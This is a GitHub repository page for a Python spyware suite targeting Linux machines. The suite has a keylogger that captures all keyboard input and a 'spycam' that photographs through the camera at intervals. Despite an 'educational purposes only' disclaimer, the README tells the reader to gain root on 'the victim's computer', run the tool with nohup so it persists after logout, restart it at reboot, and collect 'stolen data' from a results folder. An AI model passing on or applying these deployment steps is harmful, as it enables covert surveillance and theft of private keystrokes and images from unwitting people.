Skip to content

A suite of tools dedicated to spying on a machine running on GNU / linux. (Keylogger firstly)

License

Notifications You must be signed in to change notification settings

0xmathisd/python-spyware

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Python spyware

A suite of python tools dedicated to spying a machine running on GNU / linux.

Warning

This program was not created for the purpose of stealing private information from anyone, this was created for educational and preventative purposes ONLY. I do not endorse this kind of action. Using or integrating my work in anything is not without risk for you, I am not responsible for any misappropriation. No one can be held responsible for your fraudulent actions.

Available tools

  • the keylogger : capture all keyboard inputs
  • the spycam : capture picture from the camera with a regular time interval

Modules required

  • Opencv2
  • Pyxhook

How to use

+ `python3 linux/main.py --help` -> to find up-to-date information !

Be root on the victim's computer, then

nohup python3 linux/main.py [functions] [options] &

nohup (No Hang Up) is a command in Linux systems that runs the process even after logging out from the shell/terminal.

You can even run this program and restart it at each reboot Stolen data can be found by default at ./RESULT/

About

A suite of tools dedicated to spying on a machine running on GNU / linux. (Keylogger firstly)

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages